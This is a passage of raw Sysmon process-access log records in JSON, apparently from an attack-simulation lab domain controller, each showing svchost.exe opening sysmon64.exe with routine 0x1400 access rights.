05:46:49.844","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2076,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.844\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.844","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2077,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.844\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.844","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2078,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.844\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.844","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2079,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.844\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.844","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2080,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.844\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.844","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2081,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.844\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.844","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2082,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.844\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.844","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2083,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.844\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 